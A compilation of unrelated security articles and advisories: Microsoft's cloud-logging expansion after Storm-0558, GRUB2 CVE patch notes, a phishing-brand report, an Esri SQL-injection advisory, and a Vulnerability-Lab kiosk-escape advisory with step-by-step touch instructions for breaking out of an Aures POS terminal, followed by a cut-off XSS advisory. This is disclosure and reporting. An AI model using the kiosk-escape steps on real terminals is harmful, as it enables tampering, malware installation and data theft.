Microsoft on Wednesday announced that it's expanding cloud logging capabilities to help organizations investigate cybersecurity incidents and gain more visibility after facing criticism in the wake of a recent espionage attack campaign aimed at its email infrastructure.
The tech giant said it's making the change in direct response to increasing frequency and evolution of nation-state cyber

Cloud Security / Cyber Espionage

Microsoft on Wednesday announced that it's expanding cloud logging capabilities to help organizations investigate cybersecurity incidents and gain more visibility after facing criticism in the wake of a recent espionage attack campaign aimed at its email infrastructure.

The tech giant said it's making the change in direct response to increasing frequency and evolution of nation-state cyber threats. It's expected to roll out starting in September 2023 to all government and commercial customers.

"Over the coming months, we will include access to wider cloud security logs for our worldwide customers at no additional cost," Vasu Jakkal, corporate vice president of security, compliance, identity, and management at Microsoft, said. "As these changes take effect, customers can use Microsoft Purview Audit to centrally visualize more types of cloud log data generated across their enterprise."

As part of this change, users are expected to receive access to detailed logs of email access and more than 30 other types of log data previously only available at the Microsoft Purview Audit (Premium) subscription level. On top of that, the Windows maker said it's extending the default retention period for Audit Standard customers from 90 days to 180 days.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) welcomed the move, stating "having access to key logging data is important to quickly mitigating cyber intrusions" and that it's "a significant step forward toward advancing security by design principles."

The development comes in the aftermath of disclosures that a threat actor operating out of China, dubbed Storm-0558, breached 25 organizations by exploiting a validation error in the Microsoft Exchange environment.

The U.S. State Department, which was one among the affected entities, said it was able to detect the malicious mailbox activity in June 2023 due to enhanced logging in Microsoft Purview Audit, specifically using the MailItemsAccessed mailbox-auditing action, prompting Microsoft to investigate the incident.

But other impacted organizations said they were unable to detect that they were breached because they were not subscribers of E5/A5/G5 licenses, which come with elevated access to various kinds of logs that would be crucial to investigate the hack.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

Attacks mounted by the actor are said to have commenced on May 15, 2023, although Microsoft that the adversary has displayed a propensity for OAuth applications, token theft, and token replay attacks against Microsoft accounts since at least August 2021.

Microsoft, in the meanwhile, is continuing to probe the intrusions, but to date the company hasn't explained how the hackers were able to acquire an inactive Microsoft account (MSA) consumer signing key to forge authentication tokens and obtain illicit access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook.com.

"The objective of most Storm-0558 campaigns is to obtain unauthorized access to email accounts belonging to employees of targeted organizations," Microsoft revealed last week.

"Once Storm-0558 has access to the desired user credentials, the actor signs into the compromised user's cloud email account with the valid account credentials. The actor then collects information from the email account over the web service."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Expands Cloud Logging to Counter Rising Nation-State Cyber Threats

Integer underflow in grub_net_recv_ip4_packets; A malicious crafted IP packet can lead to an integer underflow in grub_net_recv_ip4_packets() function on rsm->total_len value. Under certain circumstances the total_len value may end up wrapping around to a small integer number which will be used in memory allocation. If the attack succeeds in such way, subsequent operations can write past the end of the buffer.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 7 Jun 2022 19:04:13 +0000
From: John Haxby <john.haxby@...cle.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: Daniel Kiper <daniel.kiper@...cle.com>
Subject: \[SECURITY PATCH 00/30\]  Multiple GRUB2 vulnerabilities - 2022/06/07
 round

\[ This message was sent to grub-devel@....org.   It's archived at.    \]
\[ https://lists.gnu.org/archive/html/grub-devel/2022-06/msg00035.html \]
\[ and the 30 individual patches are linked from there as well as in.  \]
\[ the git repo. These issues were previously brought to the.          \]
\[ linux-distros list.                                                 \]


Hi all,

This patch set contains a bundle of fixes for various security flaws discovered
in the GRUB2 during last year. The most severe ones, i.e. potentially exploitable,
have CVEs assigned and are listed at the end of this email. Additionally, the list
of CVEs contains a CVE assigned for the shim vulnerability. It has been added
for completeness.

Details of exactly what needs updating will be provided by the respective
distros and vendors when updates become available. Here \[1\] we are listing at
least some links to the messaging known at the time of this posting.

Full mitigation against all CVEs will require updated shim with latest SBAT
(Secure Boot Advanced Targeting) \[2\] data provided by distros and vendors.
This time UEFI revocation list (dbx) will not be used and revocation of broken
artifacts will be done with SBAT only. For information on how to apply the
latest SBAT revocations, please see mokutil(1). Vendor shims may explicitly
permit known older boot artifacts to boot.

Updated GRUB2, shim and other boot artifacts from all the affected vendors will
be made available when the embargo lifts or some time thereafter.

I am posting all the GRUB2 upstream patches which fix all security bugs found
and reported up until now. Major Linux distros carry or will carry soon one
form or another of these patches. Now all the GRUB2 upstream patches are in
the GRUB2 git repository \[3\] too.

I would like to thank, in alphabetical order, the following people who were working
really hard on the GRUB, shim and other things related to these issues:
 - Alec Brown (Oracle),
 - Alexander Burmashev (Oracle),
 - Andrew Cooper (Citrix),
 - Chris Coulson (Canonical),
 - D. Jared Dominguez (Red Hat),
 - Daniel Axtens,
 - Darren Kenny (Oracle),
 - Eric Snowberg (Oracle),
 - Ilya Okomin (Oracle),
 - Jagannathan Raman (Oracle),
 - Jan Setje-Eilers (Oracle),
 - Jeremiah Cox,
 - John Haxby (Oracle),
 - Julian Andres Klode (Canonical),
 - Lidong Chen (Oracle),
 - Marco A Benatto (Red Hat),
 - Marcus Meissner (SUSE),
 - Marta Lewandowska (Red Hat),
 - Michael Chang (SUSE),
 - Peter Jones (Red Hat),
 - Petr Janda (Red Hat),
 - Robbie Harwood (Red Hat),
 - Robert Truxal (Microsoft),
 - Ross Philipson (Oracle),
 - Steve McIntyre (Debian),
 - Sudhakar Kuppusamy (IBM),
 - Tamas K Lengyel (Intel),
 - Todd Cullum (Red Hat),
 - Vikram Narayanan (University of California Irvine).

We would not be able to succeed without all your hard work.

It was very big pleasure to work with you all.

Thank you!

Daniel

\[1\] Red Hat: https://access.redhat.com/security/security-updates/#/
   SUSE:    https://www.suse.com/support/kb/doc/?id=000020668

\[2\] https://github.com/rhboot/shim/blob/main/SBAT.md

\[3\] https://git.savannah.gnu.org/gitweb/?p=grub.git
   https://git.savannah.gnu.org/git/grub.git

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3695 grub2: Crafted PNG grayscale images may lead to out-of-bounds write in heap
7.5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

A crafted 16-bit grayscale PNG image may lead to a out-of-bounds write in the
heap area. An attacker may take advantage of that to cause heap data corruption
or eventually arbitrary code execution and circumvent secure boot protections.
This issue has a high complexity to be exploited as an attacker needs to
perform some triage over the heap layout to achieve significant results, also
the values written into the memory are repeated three times in a row making
difficult to produce valid payloads.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3696 grub2: Crafted PNG image may lead to out-of-bound write during huffman table handling
5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

A heap out-of-bounds write may happen during the handling of Huffman tables in
the PNG reader. This may lead to data corruption in the heap space.
Confidentiality, Integrity and Availability impact may be considered Low as it's
very complex to an attacker control the encoding and positioning of corrupted
Huffman entries to achieve results such as arbitrary code execution and/or
secure boot circumvention.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3697 grub2: Crafted JPEG image can lead to buffer underflow write in the heap
7.5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

A crafted JPEG image may lead the JPEG reader to underflow its data pointer,
allowing user controlled data to be written in heap. To be successfully
performed the attacker needs to do some triage over the heap layout and craft
an image with a malicious format and payload. This vulnerability can lead to
data corruption and eventual code execution or secure boot circumvention.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28733 grub2: Integer underflow in grub\_net\_recv\_ip4\_packets
8.1/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

A malicious crafted IP packet can lead to an integer underflow in
grub\_net\_recv\_ip4\_packets() function on rsm->total\_len value. Under certain
circumstances the total\_len value may end up wrapping around to a small integer
number which will be used in memory allocation. If the attack succeeds in such
way, subsequent operations can write past the end of the buffer.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28734 grub2: Out-of-bounds write when handling split HTTP headers
7/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

When handling split HTTP headers, GRUB2 HTTP code accidentally moves its
internal data buffer point by one position. This can lead to a out-of-bound
write further when parsing the HTTP request, writing a NULL byte past the
buffer. It's conceivable that an attacker controlled set of packets can lead
to corruption of the GRUB2's internal memory metadata.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28735 grub2: shim\_lock verifier allows non-kernel files to be loaded
6.7/CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

The GRUB2's shim\_lock verifier allows non-kernel files to be loaded on shim-powered
secure boot systems. Allowing such files to be loaded may lead to unverified
code and modules to be loaded in GRUB2 breaking the secure boot trust-chain.

Reported-by: Julian Andres Klode

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28736 grub2: use-after-free in grub\_cmd\_chainloader()
6.4/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

There's a use-after-free vulnerability in grub\_cmd\_chainloader() function. The
chainloader command is used to boot up operating systems that doesn't support
multiboot and do not have direct support from GRUB2. When executing chainloader
more than once a use-after-free vulnerability is triggered. If an attacker can
control the GRUB2's memory allocation pattern sensitive data may be exposed and
arbitrary code execution can be achieved.

Reported-by: Chris Coulson

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28737: shim: Buffer overflow when loading crafted EFI images
6.5/CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

There's a possible overflow in handle\_image() when shim tries to load and execute
crafted EFI executables. The handle\_image() function takes into account the SizeOfRawData
field from each section to be loaded. An attacker can leverage this to perform
out-of-bound writes into memory. Arbitrary code execution is not discarded in
such scenario.

Reported-by: Chris Coulson

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

grub-core/commands/boot.c          |  66 +++++++++++++++++++++++++++++++++++++++++++++++-------
grub-core/fs/btrfs.c               | 105 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
grub-core/fs/f2fs.c                |  58 ++++++++++++++++++++++++++++++++++++-----------
grub-core/kern/efi/sb.c            |  39 +++++++++++++++++++++++++++++---
grub-core/kern/file.c              |   2 ++
grub-core/loader/efi/chainloader.c |  46 ++++++++++++++++++++------------------
grub-core/net/dns.c                |  25 ++++++++++++++++-----
grub-core/net/http.c               |  17 +++++++++-----
grub-core/net/ip.c                 |  10 ++++++++-
grub-core/net/net.c                |  11 +++++++--
grub-core/net/netbuff.c            |  13 +++++++++++
grub-core/net/tftp.c               |   3 ++-
grub-core/normal/charset.c         |   2 ++
grub-core/video/readers/jpeg.c     | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++----------------
grub-core/video/readers/png.c      | 158 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++------------------------------------------------------------------------
include/grub/loader.h              |   5 +++++
include/grub/net.h                 |   1 +
include/grub/verify.h              |   1 +
18 files changed, 501 insertions(+), 167 deletions(-)

Chris Coulson (3):
     loader/efi/chainloader: Simplify the loader state
     commands/boot: Add API to pass context to loader
     loader/efi/chainloader: Use grub\_loader\_set\_ex()

Daniel Axtens (20):
     kern/file: Do not leak device\_name on error in grub\_file\_open()
     video/readers/png: Abort sooner if a read operation fails
     video/readers/png: Refuse to handle multiple image headers
     video/readers/png: Drop greyscale support to fix heap out-of-bounds write
     video/readers/png: Avoid heap OOB R/W inserting huff table items
     video/readers/png: Sanity check some huffman codes
     video/readers/jpeg: Abort sooner if a read operation fails
     video/readers/jpeg: Do not reallocate a given huff table
     video/readers/jpeg: Refuse to handle multiple start of streams
     video/readers/jpeg: Block int underflow -> wild pointer write
     normal/charset: Fix array out-of-bounds formatting unicode for display
     net/ip: Do IP fragment maths safely
     net/netbuff: Block overly large netbuff allocs
     net/dns: Fix double-free addresses on corrupt DNS response
     net/dns: Don't read past the end of the string we're checking against
     net/tftp: Prevent a UAF and double-free from a failed seek
     net/tftp: Avoid a trivial UAF
     net/http: Do not tear down socket if it's already been torn down
     net/http: Fix OOB write for split http headers
     net/http: Error out on headers with LF without CR

Darren Kenny (3):
     fs/btrfs: Fix several fuzz issues with invalid dir item sizing
     fs/btrfs: Fix more ASAN and SEGV issues found with fuzzing
     fs/btrfs: Fix more fuzz issues related to chunks

Julian Andres Klode (1):
     kern/efi/sb: Reject non-kernel files in the shim\_lock verifier

Sudhakar Kuppusamy (3):
     fs/f2fs: Do not read past the end of nat journal entries
     fs/f2fs: Do not read past the end of nat bitmap
     fs/f2fs: Do not copy file names that are too long

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (269 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-28733: oss-security - [SECURITY PATCH 00/30] Multiple GRUB2 vulnerabilities

By Habiba Rashid
 The report highlights the fact that cybersecurity is essential for brand protection.
This is a post from HackRead.com Read the original post: Check Point Research: Microsoft the Most Phished Brand in Q2 2023

Technology giants like Google and Apple are also among the top brands impersonated in Q2 2023 phishing attacks, Check Point Research finds.

Check Point Research (CPR) has released its highly anticipated Brand Phishing Report for the second quarter of 2023. The report reveals a shift in cybercriminal tactics, with three major technology companies dominating the list of most frequently imitated brands. The report also highlights the fact that **cybersecurity is essential for brand protection**.

Should this come as a surprise? Not at all. The prevalence of malicious Office documents accounted for 43% of all malware downloads **in 2020**. During the 3rd quarter of that year, approximately 38% of all downloadable malware was discovered concealed within Microsoft Office documents.

Microsoft, the global technology giant, claimed the top spot with a staggering 29% of all **brand phishing attempts** during Q2. This marks a significant leap for Microsoft, which had previously held the third position in the first quarter of the year.

A recently spotted phishing scam aiming at login credentials of Microsoft and Adobe users

The rise in phishing attempts can be attributed to a targeted campaign aimed at Microsoft account holders, wherein cybercriminals sent fraudulent messages regarding unusual sign-in activity.

These deceptive emails appeared to originate from within the company and included detailed information about the alleged security breach, leading users to malicious websites to steal their credentials and personal information.

**Google and Apple**

Google secured the second position, accounting for 19.5% of brand phishing attempts. Meanwhile, Apple made its debut on the list, featuring in 5.2% of phishing events during the last quarter. The technology sector itself was the most impersonated industry, followed closely by banking and social media networks.

Gmail phishing page targeting Windows users

The **report** also highlighted a worrisome trend concerning the finance industry. American banking organization Wells Fargo ranked fourth this quarter, becoming a prime target for cybercriminals through a series of malicious emails requesting account information. Other notable brands impersonated in phishing attempts included Amazon, Walmart, Roblox, LinkedIn, Home Depot, and Facebook.

Omer Dembinsky, Data Group Manager at Check Point Software, emphasized the need for vigilance when dealing with suspicious emails, stating, “While the most impersonated brands move around quarter to quarter, the tactics that cybercriminals use scarcely do. This is why we all must commit to stop and review, taking a moment before clicking on any link we don’t recognize.”

Brand phishing attacks involve cybercriminals imitating well-known brands, and deploying deceptive domains and web page designs that **resemble genuine sites** to steal users’ personal data, credentials, or payment details. These attacks can be delivered through emails, text messages, or fraudulent mobile applications.

The top phishing brands for Q2 2023 were as follows:

1.  Microsoft (29%)
2.  Google (19.5%)
3.  Apple (5.2%)
4.  Wells Fargo (4.2%)
5.  Amazon (4%)
6.  Walmart (3.9%)
7.  Roblox (3.8%)
8.  LinkedIn (3%)
9.  Home Depot (2.5%)
10.  Facebook (2.1%)

Cybersecurity experts stress the importance of being cautious and conducting due diligence before interacting with any unfamiliar links or providing personal information online. As cybercriminals continue to evolve their tactics, proactive measures and advanced security technologies become increasingly vital in the **fight against brand phishing**.

**RELATED ARTICLES**

1.  4 Essential Facets of Brand Protection
2.  42,000 phishing domains found mimicking popular brands
3.  16,000+ Scam Domains Aimed at FIFA World Cup Fans in Qatar
4.  Google, Microsoft &Oracle generated most vulnerabilities in 2021
5.  Microsoft, PayPal & Facebook most targeted phished brands- 2019

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Check Point Research: Microsoft the Most Phished Brand in Q2 2023


There is SQL injection vulnerability in Esri ArcGIS Insights 2022.1 for ArcGIS Enterprise and that may allow a remote, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.



Esri has released ArcGIS Insights Security Patches for ArcGIS Insights 2022.1. These patches resolve high severity security vulnerabilities in ArcGIS Insights Desktop (Windows and Mac), ArcGIS Enterprise on Windows, ArcGIS Server and Portal for ArcGIS on Linux either as the base deployment or the primary ArcGIS connection.

These patches were released on June 23, 2023 and are available here.

We provide Common Vulnerability Scoring System v.3.1 (CVSS) scores to allow our customers to better assess risk of these vulnerabilities to their operations.  Both base and modified temporal scores are provided to reflect the availability of an official patch.

****Vulnerabilities fixed by this patch:****

**There is SQL injection vulnerability** in Esri ArcGIS Insights 2022.1 for ArcGIS Enterprise and that may allow a remote, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.

*   **CVE Details:**CVE-2023-25838
*   **Esri BUG ID: \[**BUG-000157278 **– ArcGIS Insights has a security vulnerability.\]**
*   CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
*   Base CVSSv31: 7.5 /AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
*   Environmentally Modified CVSSv3.1: 7.2  /AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/

**There is SQL injection vulnerability** in Esri ArcGIS Insights Desktop for Mac and Windows version 2022.1  that may allow a local, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.

*   **CVE Details:**CVE-2023-25839
*   **Esri BUG ID: \[**BUG-000157278 **– ArcGIS Insights has a security vulnerability.\]**
*   CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
*   Base CVSSv31: 7.0 /AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
*   Environmentally Modified CVSSv3.1: 6.7  /AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/RL:O

Install the provided patches to remediate these issues.

CVE-2023-25838: ArcGIS Insights Security Patches for ArcGIS Insights 2022.1 are now available

Aures Booking and POS Terminal suffers from a local privilege escalation vulnerability.

Document Title:  
===============  
Aures Booking & POS Terminal - Local Privilege Escalation

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2323

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2323

Common Vulnerability Scoring System:  
====================================  
7.2

Vulnerability Class:  
====================  
Privilege Escalation

Current Estimated Price:  
========================  
3.000€ - 4.000€

Product & Service Introduction:  
===============================  
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or  
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk  
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.  
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to  
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of  
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.

Affected Product(s):  
====================  
Aures Technologies GmbH  
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)

Vulnerability Disclosure Timeline:  
==================================  
2023-05-09: Researcher Notification & Coordination (Security Researcher)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Local

Severity Level:  
===============  
High

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
No User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal  
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers  
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are  
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security  
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local  
privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate  
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system  
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):  
[+] Windows 10 (IoT Enterprise)

Affected Component(s):  
[+] Context Menu

Affected Function(s):  
[+] Web Search  
[+] Share (Teilen)

Proof of Concept (PoC):  
=======================  
The local vulnerability can be exploited by local attackers with physical device access without user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet  
Touch Display => Select Food Item => Highlight Text  
=> Open Context Menu => Extend Context Menu => Web-Search  
=> Browser => Local File System => Compromised!

Manual steps to reproduce the vulnerability ...  
01.  First touch the monitor display to move on from standby  
02.  Select an food item from the menu of immergrün (we recomment the cesar wraps)  
03.  Push the information button of the selected food item  
04.  Push twice via touch to mark the selected food item text  
05.  Press a third time after you have marked the context by holding it down on the touch display  
06.  Now the function context menu of the operating system for highlighted text appears  
07.  On the context menu appearing 3 dots to extend the visible function menu  
08.  Select the web-search or share function for the highlighted content in the context menu  
09.  The browser of the operating system opens on the main front screen  
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)  
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)  
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)  
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)  
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)  
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols  
10.7 Attackers are able to perform man in the middle attacks from the local computer system  
11.0 Successful reproduce of the security vulnerability!

Reference(s): Pictures  
- 1.png (Terminal A)  
- 2.png (Terminal B)  
- 3.png (Escape)  
- 4.png (Awareness)

Solution - Fix & Patch:  
=======================  
The security vulnerabilities can be patched by following steps:  
1.  Disable the content menu to extend  
2.  Disable the context menu  
3.  Disable web-search  
4.  Disable to mark text inputs & texts  
5.  Disallow to open not white listed websites  
6.  Disable to download files  
7.  Restrict the web-browser access  
8.  Disallow the file browser  
9.  Disable the browser debug modus  
10. Reconfigure the local firewall to allow and disallow connections  
11. Change the access permission to prevent exfiltration

Security Risk:  
==============  
The security risk of the vulnerability in the local booking and payment terminal system is considered high.  
The issue can be easily exploited by local attackers with simple interaction via the touch display.  
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse  
it for further simple or more complex attack scenarios.

Credits & Authors:  
==================  
Benjamin Mejri (Kunz)   -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.  
Lars Guenther     -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Aures Booking And POS Terminal Local Privilege Escalation

Webile version 1.0.1 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Webile v1.0.1 - Multiple Cross Site Web VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2321Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2321Common Vulnerability Scoring System:====================================5.5Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-10-11: Researcher Notification & Coordination (Security Researcher)2022-10-12: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation 